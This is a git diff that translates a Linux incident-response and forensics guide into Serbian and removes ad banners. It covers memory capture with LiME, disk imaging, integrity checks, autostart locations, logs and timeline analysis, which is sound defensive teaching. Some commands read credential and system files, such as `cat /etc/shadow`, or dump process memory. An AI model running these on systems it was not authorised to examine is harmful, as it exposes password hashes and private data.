-Once you have configured the system to use good and known binaries you can start **extracting some basic information**:
-
+Kada konfigurišete sistem da koristi dobre i poznate binarne datoteke, možete početi **izvlačenje osnovnih informacija**:
 ```bash
 date #Date and time (Clock may be skewed, Might be at a different timezone)
 uname -a #OS info
@@ -40,50 +29,46 @@ cat /etc/passwd #Unexpected data?
 cat /etc/shadow #Unexpected data?
 find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory
 ```
+#### Sumnjive informacije
 
-#### Suspicious information
+Dok prikupljate osnovne informacije, trebali biste proveriti čudne stvari kao što su:
 
-While obtaining the basic information you should check for weird things like:
+- **Root procesi** obično se pokreću sa niskim PIDS, pa ako pronađete root proces sa velikim PID-om, možete posumnjati
+- Proverite **registrovane prijave** korisnika bez shel-a unutar `/etc/passwd`
+- Proverite **hash-eve lozinke** unutar `/etc/shadow` za korisnike bez shel-a
 
-- **Root processes** usually run with low PIDS, so if you find a root process with a big PID you may suspect
-- Check **registered logins** of users without a shell inside `/etc/passwd`
-- Check for **password hashes** inside `/etc/shadow` for users without a shell
+### Dump memorije
 
-### Memory Dump
-
-To obtain the memory of the running system, it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\
-To **compile** it, you need to use the **same kernel** that the victim machine is using.
+Da biste dobili memoriju pokrenutog sistema, preporučuje se korišćenje [**LiME**](https://github.com/504ensicsLabs/LiME).\
+Da biste ga **kompilirali**, morate koristiti **isti kernel** koji koristi žrtvinska mašina.
 
 > [!NOTE]
-> Remember that you **cannot install LiME or any other thing** in the victim machine as it will make several changes to it
-
-So, if you have an identical version of Ubuntu you can use `apt-get install lime-forensics-dkms`\
-In other cases, you need to download [**LiME**](https://github.com/504ensicsLabs/LiME) from github and compile it with correct kernel headers. To **obtain the exact kernel headers** of the victim machine, you can just **copy the directory** `/lib/modules/` to your machine, and then **compile** LiME using them:
+> Zapamtite da **ne možete instalirati LiME ili bilo šta drugo** na žrtvinskoj mašini jer će to napraviti nekoliko promena na njoj
 
+Dakle, ako imate identičnu verziju Ubuntua, možete koristiti `apt-get install lime-forensics-dkms`\
+U drugim slučajevima, potrebno je preuzeti [**LiME**](https://github.com/504ensicsLabs/LiME) sa github-a i kompilirati ga sa ispravnim kernel header-ima. Da biste **dobili tačne kernel header-e** žrtvinske mašine, možete jednostavno **kopirati direktorijum** `/lib/modules/` na vašu mašinu, a zatim **kompilirati** LiME koristeći ih:
 ```bash
 make -C /lib/modules//build M=$PWD
 sudo insmod lime.ko "path=/home/sansforensics/Desktop/mem_dump.bin format=lime"
 ```
+LiME podržava 3 **formata**:
 
-LiME supports 3 **formats**:
+- Raw (svaki segment spojен zajedno)
+- Padded (isto kao raw, ali sa nulama u desnim bitovima)
+- Lime (preporučeni format sa metapodacima)
 
-- Raw (every segment concatenated together)
-- Padded (same as raw, but with zeroes in right bits)
-- Lime (recommended format with metadata
-
-LiME can also be used to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444`
+LiME se takođe može koristiti za **slanje dump-a putem mreže** umesto da se čuva na sistemu koristeći nešto poput: `path=tcp:4444`
 
 ### Disk Imaging
 
-#### Shutting down
+#### Isključivanje
 
-First of all, you will need to **shut down the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shut down.\
-There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but it will also allow the possible **malware** to **destroy evidence**. The "pull the plug" approach may carry **some information loss** (not much of the info is going to be lost as we already took an image of the memory ) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug.
+Prvo, potrebno je da **isključite sistem**. Ovo nije uvek opcija jer ponekad sistem može biti produkcijski server koji kompanija ne može priuštiti da isključi.\
+Postoje **2 načina** za isključivanje sistema, **normalno isključivanje** i **"isključivanje iz struje"**. Prvi će omogućiti da se **procesi završe kao obično** i da se **fajl sistem** **sinhronizuje**, ali će takođe omogućiti mogućem **malware-u** da **uništi dokaze**. Pristup "isključivanja iz struje" može doneti **neki gubitak informacija** (neće se mnogo informacija izgubiti jer smo već uzeli sliku memorije) i **malware neće imati priliku** da uradi bilo šta povodom toga. Stoga, ako **sumnjate** da može biti **malware**, jednostavno izvršite **`sync`** **komandu** na sistemu i isključite iz struje.
 
-#### Taking an image of the disk
-
-It's important to note that **before connecting your computer to anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying any information.
+#### Uzimanje slike diska
 
+Važno je napomenuti da **pre nego što povežete svoj računar sa bilo čim vezanim za slučaj**, morate biti sigurni da će biti **montiran kao samo za čitanje** kako biste izbegli modifikaciju bilo kojih informacija.
 ```bash
 #Create a raw copy of the disk
 dd if= of= bs=512
@@ -92,11 +77,9 @@ dd if= of= bs=512
 dcfldd if= of= bs=512 hash= hashwindow= hashlog=
 dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
 ```
+### Disk Image pre-analiza
 
-### Disk Image pre-analysis
-
-Imaging a disk image with no more data.
-
+Imaging diska bez dodatnih podataka.
 ```bash
 #Find out if it's a disk image using "file" command
 file disk.img
@@ -108,12 +91,12 @@ raw
 #You can list supported types with
 img_stat -i list
 Supported image format types:
-        raw (Single or split raw file (dd))
-        aff (Advanced Forensic Format)
-        afd (AFF Multiple File)
-        afm (AFF with external metadata)
-        afflib (All AFFLIB image formats (including beta ones))
-        ewf (Expert Witness Format (EnCase))
+raw (Single or split raw file (dd))
+aff (Advanced Forensic Format)
+afd (AFF Multiple File)
+afm (AFF with external metadata)
+afflib (All AFFLIB image formats (including beta ones))
+ewf (Expert Witness Format (EnCase))
 
 #Data of the image
 fsstat -i raw -f ext4 disk.img
@@ -149,41 +132,31 @@ r/r 16: secret.txt
 icat -i raw -f ext4 disk.img 16
 ThisisTheMasterSecret
 ```
+## Pretraživanje poznatog Malware-a
 
-

+### Izmenjeni sistemski fajlovi
 
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Linux nudi alate za osiguranje integriteta sistemskih komponenti, što je ključno za uočavanje potencijalno problematičnih fajlova.
 
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %}
+- **RedHat-bazirani sistemi**: Koristite `rpm -Va` za sveobuhvatnu proveru.
+- **Debian-bazirani sistemi**: `dpkg --verify` za inicijalnu verifikaciju, a zatim `debsums | grep -v "OK$"` (nakon instalacije `debsums` sa `apt-get install debsums`) za identifikaciju bilo kakvih problema.
 
-## Search for known Malware
+### Malware/Rootkit detektori
 
-### Modified System Files
-
-Linux offers tools for ensuring the integrity of system components, crucial for spotting potentially problematic files.
-
-- **RedHat-based systems**: Use `rpm -Va` for a comprehensive check.
-- **Debian-based systems**: `dpkg --verify` for initial verification, followed by `debsums | grep -v "OK$"` (after installing `debsums` with `apt-get install debsums`) to identify any issues.
-
-### Malware/Rootkit Detectors
-
-Read the following page to learn about tools that can be useful to find malware:
+Pročitajte sledeću stranicu da biste saznali više o alatima koji mogu biti korisni za pronalaženje malware-a:
 
 {{#ref}}
 malware-analysis.md
 {{#endref}}
 
-## Search installed programs
+## Pretraživanje instaliranih programa
 
-To effectively search for installed programs on both Debian and RedHat systems, consider leveraging system logs and databases alongside manual checks in common directories.
+Da biste efikasno pretražili instalirane programe na Debian i RedHat sistemima, razmotrite korišćenje sistemskih logova i baza podataka zajedno sa ručnim proverama u uobičajenim direktorijumima.
 
-- For Debian, inspect _**`/var/lib/dpkg/status`**_ and _**`/var/log/dpkg.log`**_ to fetch details about package installations, using `grep` to filter for specific information.
-- RedHat users can query the RPM database with `rpm -qa --root=/mntpath/var/lib/rpm` to list installed packages.
-
-To uncover software installed manually or outside of these package managers, explore directories like _**`/usr/local`**_, _**`/opt`**_, _**`/usr/sbin`**_, _**`/usr/bin`**_, _**`/bin`**_, and _**`/sbin`**_. Combine directory listings with system-specific commands to identify executables not associated with known packages, enhancing your search for all installed programs.
+- Za Debian, proverite _**`/var/lib/dpkg/status`**_ i _**`/var/log/dpkg.log`**_ da biste dobili detalje o instalacijama paketa, koristeći `grep` za filtriranje specifičnih informacija.
+- RedHat korisnici mogu upitati RPM bazu podataka sa `rpm -qa --root=/mntpath/var/lib/rpm` da bi prikazali instalirane pakete.
 
+Da biste otkrili softver instaliran ručno ili van ovih menadžera paketa, istražite direktorijume kao što su _**`/usr/local`**_, _**`/opt`**_, _**`/usr/sbin`**_, _**`/usr/bin`**_, _**`/bin`**_, i _**`/sbin`**_. Kombinujte liste direktorijuma sa sistemskim komandama specifičnim za identifikaciju izvršnih fajlova koji nisu povezani sa poznatim paketima, poboljšavajući vaše pretraživanje svih instaliranih programa.
 ```bash
 # Debian package and log details
 cat /var/lib/dpkg/status | grep -E "Package:|Status:"
@@ -199,29 +172,17 @@ find /sbin/ –exec rpm -qf {} \; | grep "is not"
 # Find exacuable files
 find / -type f -executable | grep 
 ```
+## Oporavak Izbrisanih Pokrenutih Binarnih Datoteka
 
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %}
-
-## Recover Deleted Running Binaries
-
-Imagine a process that was executed from /tmp/exec and then deleted. It's possible to extract it
-
+Zamislite proces koji je izvršen iz /tmp/exec i zatim obrisan. Moguće je izvući ga.
 ```bash
 cd /proc/3746/ #PID with the exec file deleted
 head -1 maps #Get address of the file. It was 08048000-08049000
 dd if=mem bs=1 skip=08048000 count=1000 of=/tmp/exec2 #Recorver it
 ```
+## Inspekcija lokacija za automatsko pokretanje
 
-## Inspect Autostart locations
-
-### Scheduled Tasks
-
+### Zakazani zadaci
 ```bash
 cat /var/spool/cron/crontabs/*  \
 /var/spool/cron/atjobs \
@@ -235,61 +196,60 @@ cat /var/spool/cron/crontabs/*  \
 #MacOS
 ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/
 ```
+### Usluge
 
-### Services
+Putanje gde se zlonamerni softver može instalirati kao usluga:
 
-Paths where a malware could be installed as a service:
+- **/etc/inittab**: Poziva skripte inicijalizacije kao što su rc.sysinit, usmeravajući dalje na skripte za pokretanje.
+- **/etc/rc.d/** i **/etc/rc.boot/**: Sadrže skripte za pokretanje usluga, pri čemu se potonja nalazi u starijim verzijama Linux-a.
+- **/etc/init.d/**: Koristi se u određenim verzijama Linux-a kao što je Debian za čuvanje skripti za pokretanje.
+- Usluge se takođe mogu aktivirati putem **/etc/inetd.conf** ili **/etc/xinetd/**, u zavisnosti od Linux varijante.
+- **/etc/systemd/system**: Direktorijum za skripte menadžera sistema i usluga.
+- **/etc/systemd/system/multi-user.target.wants/**: Sadrži linkove do usluga koje treba pokrenuti u višekorisničkom režimu.
+- **/usr/local/etc/rc.d/**: Za prilagođene ili usluge trećih strana.
+- **\~/.config/autostart/**: Za automatske aplikacije specifične za korisnika, koje mogu biti skriveno mesto za zlonamerni softver usmeren na korisnike.
+- **/lib/systemd/system/**: Podrazumevane jedinice sistema koje obezbeđuju instalirani paketi.
 
-- **/etc/inittab**: Calls initialization scripts like rc.sysinit, directing further to startup scripts.
-- **/etc/rc.d/** and **/etc/rc.boot/**: Contain scripts for service startup, the latter being found in older Linux versions.
-- **/etc/init.d/**: Used in certain Linux versions like Debian for storing startup scripts.
-- Services may also be activated via **/etc/inetd.conf** or **/etc/xinetd/**, depending on the Linux variant.
-- **/etc/systemd/system**: A directory for system and service manager scripts.
-- **/etc/systemd/system/multi-user.target.wants/**: Contains links to services that should be started in a multi-user runlevel.
-- **/usr/local/etc/rc.d/**: For custom or third-party services.
-- **\~/.config/autostart/**: For user-specific automatic startup applications, which can be a hiding spot for user-targeted malware.
-- **/lib/systemd/system/**: System-wide default unit files provided by installed packages.
+### Kernel moduli
 
-### Kernel Modules
+Linux kernel moduli, često korišćeni od strane zlonamernog softvera kao komponenti rootkita, učitavaju se prilikom pokretanja sistema. Direktorijumi i datoteke kritične za ove module uključuju:
 
-Linux kernel modules, often utilized by malware as rootkit components, are loaded at system boot. The directories and files critical for these modules include:
+- **/lib/modules/$(uname -r)**: Sadrži module za trenutnu verziju kernela.
+- **/etc/modprobe.d**: Sadrži konfiguracione datoteke za kontrolu učitavanja modula.
+- **/etc/modprobe** i **/etc/modprobe.conf**: Datoteke za globalne postavke modula.
 
-- **/lib/modules/$(uname -r)**: Holds modules for the running kernel version.
-- **/etc/modprobe.d**: Contains configuration files to control module loading.
-- **/etc/modprobe** and **/etc/modprobe.conf**: Files for global module settings.
+### Druge lokacije za automatsko pokretanje
 
-### Other Autostart Locations
+Linux koristi razne datoteke za automatsko izvršavanje programa prilikom prijavljivanja korisnika, potencijalno skrivajući zlonamerni softver:
 
-Linux employs various files for automatically executing programs upon user login, potentially harboring malware:
+- **/etc/profile.d/**\*, **/etc/profile**, i **/etc/bash.bashrc**: Izvršavaju se za bilo koju prijavu korisnika.
+- **\~/.bashrc**, **\~/.bash_profile**, **\~/.profile**, i **\~/.config/autostart**: Datoteke specifične za korisnika koje se pokreću prilikom njihove prijave.
+- **/etc/rc.local**: Izvršava se nakon što su sve sistemske usluge pokrenute, označavajući kraj prelaska u višekorisničko okruženje.
 
-- **/etc/profile.d/**\*, **/etc/profile**, and **/etc/bash.bashrc**: Executed for any user login.
-- **\~/.bashrc**, **\~/.bash_profile**, **\~/.profile**, and **\~/.config/autostart**: User-specific files that run upon their login.
-- **/etc/rc.local**: Runs after all system services have started, marking the end of the transition to a multiuser environment.
+## Istraži logove
 
-## Examine Logs
+Linux sistemi prate aktivnosti korisnika i događaje sistema kroz razne log datoteke. Ovi logovi su ključni za identifikaciju neovlašćenog pristupa, infekcija zlonamernim softverom i drugih bezbednosnih incidenata. Ključne log datoteke uključuju:
 
-Linux systems track user activities and system events through various log files. These logs are pivotal for identifying unauthorized access, malware infections, and other security incidents. Key log files include:
-
-- **/var/log/syslog** (Debian) or **/var/log/messages** (RedHat): Capture system-wide messages and activities.
-- **/var/log/auth.log** (Debian) or **/var/log/secure** (RedHat): Record authentication attempts, successful and failed logins.
-  - Use `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` to filter relevant authentication events.
-- **/var/log/boot.log**: Contains system startup messages.
-- **/var/log/maillog** or **/var/log/mail.log**: Logs email server activities, useful for tracking email-related services.
-- **/var/log/kern.log**: Stores kernel messages, including errors and warnings.
-- **/var/log/dmesg**: Holds device driver messages.
-- **/var/log/faillog**: Records failed login attempts, aiding in security breach investigations.
-- **/var/log/cron**: Logs cron job executions.
-- **/var/log/daemon.log**: Tracks background service activities.
-- **/var/log/btmp**: Documents failed login attempts.
-- **/var/log/httpd/**: Contains Apache HTTPD error and access logs.
-- **/var/log/mysqld.log** or **/var/log/mysql.log**: Logs MySQL database activities.
-- **/var/log/xferlog**: Records FTP file transfers.
-- **/var/log/**: Always check for unexpected logs here.
+- **/var/log/syslog** (Debian) ili **/var/log/messages** (RedHat): Zabeležavaju poruke i aktivnosti na sistemskom nivou.
+- **/var/log/auth.log** (Debian) ili **/var/log/secure** (RedHat): Beleže pokušaje autentifikacije, uspešne i neuspešne prijave.
+- Koristite `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` za filtriranje relevantnih događaja autentifikacije.
+- **/var/log/boot.log**: Sadrži poruke o pokretanju sistema.
+- **/var/log/maillog** ili **/var/log/mail.log**: Logovi aktivnosti email servera, korisni za praćenje usluga vezanih za email.
+- **/var/log/kern.log**: Čuva poruke kernela, uključujući greške i upozorenja.
+- **/var/log/dmesg**: Sadrži poruke drajvera uređaja.
+- **/var/log/faillog**: Beleži neuspešne pokušaje prijave, pomažući u istragama bezbednosnih proboja.
+- **/var/log/cron**: Logovi izvršavanja cron poslova.
+- **/var/log/daemon.log**: Prati aktivnosti pozadinskih usluga.
+- **/var/log/btmp**: Dokumentuje neuspešne pokušaje prijave.
+- **/var/log/httpd/**: Sadrži Apache HTTPD greške i logove pristupa.
+- **/var/log/mysqld.log** ili **/var/log/mysql.log**: Logovi aktivnosti MySQL baze podataka.
+- **/var/log/xferlog**: Beleži FTP transfer fajlova.
+- **/var/log/**: Uvek proverite neočekivane logove ovde.
 
 > [!NOTE]
-> Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. Because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering.
+> Linux sistemski logovi i audit pod-sistemi mogu biti onemogućeni ili obrisani tokom upada ili incidenta sa zlonamernim softverom. Pošto logovi na Linux sistemima obično sadrže neke od najkorisnijih informacija o zlonamernim aktivnostima, napadači ih rutinski brišu. Stoga, prilikom ispitivanja dostupnih log datoteka, važno je tražiti praznine ili neuredne unose koji bi mogli biti indikacija brisanja ili manipulacije.
 
-**Linux maintains a command history for each user**, stored in:
+**Linux održava istoriju komandi za svakog korisnika**, koja se čuva u:
 
 - \~/.bash_history
 - \~/.zsh_history
@@ -297,42 +257,39 @@ Linux systems track user activities and system events through various log files.
 - \~/.python_history
 - \~/.\*\_history
 
-Moreover, the `last -Faiwx` command provides a list of user logins. Check it for unknown or unexpected logins.
+Pored toga, komanda `last -Faiwx` pruža listu prijava korisnika. Proverite je za nepoznate ili neočekivane prijave.
 
-Check files that can grant extra rprivileges:
+Proverite datoteke koje mogu dodeliti dodatne privilegije:
 
-- Review `/etc/sudoers` for unanticipated user privileges that may have been granted.
-- Review `/etc/sudoers.d/` for unanticipated user privileges that may have been granted.
-- Examine `/etc/groups` to identify any unusual group memberships or permissions.
-- Examine `/etc/passwd` to identify any unusual group memberships or permissions.
+- Pregledajte `/etc/sudoers` za neočekivane privilegije korisnika koje su možda dodeljene.
+- Pregledajte `/etc/sudoers.d/` za neočekivane privilegije korisnika koje su možda dodeljene.
+- Istražite `/etc/groups` da identifikujete bilo kakva neobična članstva u grupama ili dozvole.
+- Istražite `/etc/passwd` da identifikujete bilo kakva neobična članstva u grupama ili dozvole.
 
-Some apps alse generates its own logs:
+Neke aplikacije takođe generišu svoje logove:
 
-- **SSH**: Examine _\~/.ssh/authorized_keys_ and _\~/.ssh/known_hosts_ for unauthorized remote connections.
-- **Gnome Desktop**: Look into _\~/.recently-used.xbel_ for recently accessed files via Gnome applications.
-- **Firefox/Chrome**: Check browser history and downloads in _\~/.mozilla/firefox_ or _\~/.config/google-chrome_ for suspicious activities.
-- **VIM**: Review _\~/.viminfo_ for usage details, such as accessed file paths and search history.
-- **Open Office**: Check for recent document access that may indicate compromised files.
-- **FTP/SFTP**: Review logs in _\~/.ftp_history_ or _\~/.sftp_history_ for file transfers that might be unauthorized.
-- **MySQL**: Investigate _\~/.mysql_history_ for executed MySQL queries, potentially revealing unauthorized database activities.
-- **Less**: Analyze _\~/.lesshst_ for usage history, including viewed files and commands executed.
-- **Git**: Examine _\~/.gitconfig_ and project _.git/logs_ for changes to repositories.
+- **SSH**: Istražite _\~/.ssh/authorized_keys_ i _\~/.ssh/known_hosts_ za neovlašćene udaljene konekcije.
+- **Gnome Desktop**: Pogledajte _\~/.recently-used.xbel_ za nedavno pristupane datoteke putem Gnome aplikacija.
+- **Firefox/Chrome**: Proverite istoriju pretraživača i preuzimanja u _\~/.mozilla/firefox_ ili _\~/.config/google-chrome_ za sumnjive aktivnosti.
+- **VIM**: Pregledajte _\~/.viminfo_ za detalje o korišćenju, kao što su pristupene putanje datoteka i istorija pretrage.
+- **Open Office**: Proverite za nedavni pristup dokumentima koji mogu ukazivati na kompromitovane datoteke.
+- **FTP/SFTP**: Pregledajte logove u _\~/.ftp_history_ ili _\~/.sftp_history_ za transfer fajlova koji bi mogli biti neovlašćeni.
+- **MySQL**: Istražite _\~/.mysql_history_ za izvršene MySQL upite, što može otkriti neovlašćene aktivnosti u bazi podataka.
+- **Less**: Analizirajte _\~/.lesshst_ za istoriju korišćenja, uključujući pregledane datoteke i izvršene komande.
+- **Git**: Istražite _\~/.gitconfig_ i projekat _.git/logs_ za promene u repozitorijumima.
 
-### USB Logs
+### USB logovi
 
-[**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables.
+[**usbrip**](https://github.com/snovvcrash/usbrip) je mali komad softvera napisan u čistom Python 3 koji analizira Linux log datoteke (`/var/log/syslog*` ili `/var/log/messages*` u zavisnosti od distribucije) za konstruisanje tabela istorije USB događaja.
 
-It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USBs to find "violation events" (the use of USBs that aren't inside that list).
-
-### Installation
+Zanimljivo je **znati sve USB uređaje koji su korišćeni** i biće korisnije ako imate autorizovanu listu USB uređaja da pronađete "događaje kršenja" (korišćenje USB uređaja koji nisu na toj listi).
 
+### Instalacija
 ```bash
 pip3 install usbrip
 usbrip ids download #Download USB ID database
 ```
-
-### Examples
-
+### Primeri
 ```bash
 usbrip events history #Get USB history of your curent linux machine
 usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR user
@@ -340,40 +297,30 @@ usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR
 usbrip ids download #Downlaod database
 usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
 ```
+Više primera i informacija unutar github-a: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
 
-More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
+## Pregled korisničkih naloga i aktivnosti prijavljivanja
 
-

+Istražite _**/etc/passwd**_, _**/etc/shadow**_ i **bezbednosne logove** za neobične nazive ili naloge koji su kreirani i ili korišćeni u bliskoj blizini poznatih neovlašćenih događaja. Takođe, proverite moguće sudo brute-force napade.\
+Pored toga, proverite datoteke kao što su _**/etc/sudoers**_ i _**/etc/groups**_ za neočekivane privilegije dodeljene korisnicima.\
+Na kraju, potražite naloge sa **bez lozinki** ili **lako pogađenim** lozinkama.
 
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+## Istraživanje fajl sistema
 
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %}
+### Analiza struktura fajl sistema u istraživanju malvera
 
-## Review User Accounts and Logon Activities
+Kada istražujete incidente sa malverom, struktura fajl sistema je ključni izvor informacija, otkrivajući kako redosled događaja tako i sadržaj malvera. Međutim, autori malvera razvijaju tehnike za ometanje ove analize, kao što su modifikovanje vremenskih oznaka fajlova ili izbegavanje fajl sistema za skladištenje podataka.
 
-Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and or used in close proximity to known unauthorized events. Also, check possible sudo brute-force attacks.\
-Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\
-Finally, look for accounts with **no passwords** or **easily guessed** passwords.
-
-## Examine File System
-
-### Analyzing File System Structures in Malware Investigation
-
-When investigating malware incidents, the structure of the file system is a crucial source of information, revealing both the sequence of events and the malware's content. However, malware authors are developing techniques to hinder this analysis, such as modifying file timestamps or avoiding the file system for data storage.
-
-To counter these anti-forensic methods, it's essential to:
-
-- **Conduct a thorough timeline analysis** using tools like **Autopsy** for visualizing event timelines or **Sleuth Kit's** `mactime` for detailed timeline data.
-- **Investigate unexpected scripts** in the system's $PATH, which might include shell or PHP scripts used by attackers.
-- **Examine `/dev` for atypical files**, as it traditionally contains special files, but may house malware-related files.
-- **Search for hidden files or directories** with names like ".. " (dot dot space) or "..^G" (dot dot control-G), which could conceal malicious content.
-- **Identify setuid root files** using the command: `find / -user root -perm -04000 -print` This finds files with elevated permissions, which could be abused by attackers.
-- **Review deletion timestamps** in inode tables to spot mass file deletions, possibly indicating the presence of rootkits or trojans.
-- **Inspect consecutive inodes** for nearby malicious files after identifying one, as they may have been placed together.
-- **Check common binary directories** (_/bin_, _/sbin_) for recently modified files, as these could be altered by malware.
+Da biste se suprotstavili ovim anti-forenzičkim metodama, važno je:
 
+- **Sprovesti temeljnu analizu vremenskih linija** koristeći alate kao što su **Autopsy** za vizualizaciju vremenskih linija događaja ili **Sleuth Kit's** `mactime` za detaljne podatke o vremenskim linijama.
+- **Istražiti neočekivane skripte** u sistemskom $PATH, koje mogu uključivati shell ili PHP skripte koje koriste napadači.
+- **Istražiti `/dev` za atipične fajlove**, jer tradicionalno sadrži specijalne fajlove, ali može sadržati i fajlove povezane sa malverom.
+- **Pretražiti skrivene fajlove ili direktorijume** sa imenima kao što su ".. " (tačka tačka razmak) ili "..^G" (tačka tačka kontrola-G), koji mogu skrivati zlonamerni sadržaj.
+- **Identifikovati setuid root fajlove** koristeći komandu: `find / -user root -perm -04000 -print` Ovo pronalazi fajlove sa povišenim privilegijama, koje napadači mogu zloupotrebiti.
+- **Pregledati vremenske oznake brisanja** u inode tabelama kako bi se uočila masovna brisanja fajlova, što može ukazivati na prisustvo rootkit-ova ili trojanaca.
+- **Inspektovati uzastopne inode** za obližnje zlonamerne fajlove nakon identifikacije jednog, jer su možda postavljeni zajedno.
+- **Proveriti uobičajene binarne direktorijume** (_/bin_, _/sbin_) za nedavno modifikovane fajlove, jer bi ovi mogli biti izmenjeni od strane malvera.
 ````bash
 # List recent files in a directory:
 ls -laR --sort=time /bin```
@@ -381,58 +328,43 @@ ls -laR --sort=time /bin```
 # Sort files in a directory by inode:
 ls -lai /bin | sort -n```
 ````
-
 > [!NOTE]
-> Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modified at the **same time** as the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**.
+> Imajte na umu da **napadač** može **modifikovati** **vreme** kako bi **datoteke izgledale** **legitimno**, ali ne može **modifikovati** **inode**. Ako otkrijete da **datoteka** pokazuje da je kreirana i modifikovana u **isto vreme** kao i ostale datoteke u istoj fascikli, ali je **inode** **neočekivano veći**, onda su **vremenske oznake te datoteke modifikovane**.
 
-## Compare files of different filesystem versions
+## Uporedite datoteke različitih verzija datotečnog sistema
 
-### Filesystem Version Comparison Summary
+### Sažetak uporedbe verzija datotečnog sistema
 
-To compare filesystem versions and pinpoint changes, we use simplified `git diff` commands:
-
-- **To find new files**, compare two directories:
+Da bismo uporedili verzije datotečnog sistema i precizno odredili promene, koristimo pojednostavljene `git diff` komande:
 
+- **Da pronađete nove datoteke**, uporedite dve fascikle:
 ```bash
 git diff --no-index --diff-filter=A path/to/old_version/ path/to/new_version/
 ```
-
-- **For modified content**, list changes while ignoring specific lines:
-
+- **Za izmenjen sadržaj**, navedite promene ignorišući specifične linije:
 ```bash
 git diff --no-index --diff-filter=M path/to/old_version/ path/to/new_version/ | grep -E "^\+" | grep -v "Installed-Time"
 ```
-
-- **To detect deleted files**:
-
+- **Da biste otkrili obrisane fajlove**:
 ```bash
 git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/
 ```
+- **Opcije filtriranja** (`--diff-filter`) pomažu u sužavanju na specifične promene kao što su dodati (`A`), obrisani (`D`) ili izmenjeni (`M`) fajlovi.
+- `A`: Dodati fajlovi
+- `C`: Kopirani fajlovi
+- `D`: Obrisani fajlovi
+- `M`: Izmenjeni fajlovi
+- `R`: Preimenovani fajlovi
+- `T`: Promene tipa (npr., fajl u symlink)
+- `U`: Neusaglašeni fajlovi
+- `X`: Nepoznati fajlovi
+- `B`: Pokvareni fajlovi
 
-- **Filter options** (`--diff-filter`) help narrow down to specific changes like added (`A`), deleted (`D`), or modified (`M`) files.
-  - `A`: Added files
-  - `C`: Copied files
-  - `D`: Deleted files
-  - `M`: Modified files
-  - `R`: Renamed files
-  - `T`: Type changes (e.g., file to symlink)
-  - `U`: Unmerged files
-  - `X`: Unknown files
-  - `B`: Broken files
-
-## References
+## Reference
 
 - [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems_Ch3.pdf)
 - [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/)
 - [https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203](https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203)
-- **Book: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides**
+- **Knjiga: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides**
 
 {{#include ../../banners/hacktricks-training.md}}
-
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md
index c7edd6650..53e806d6a 100644
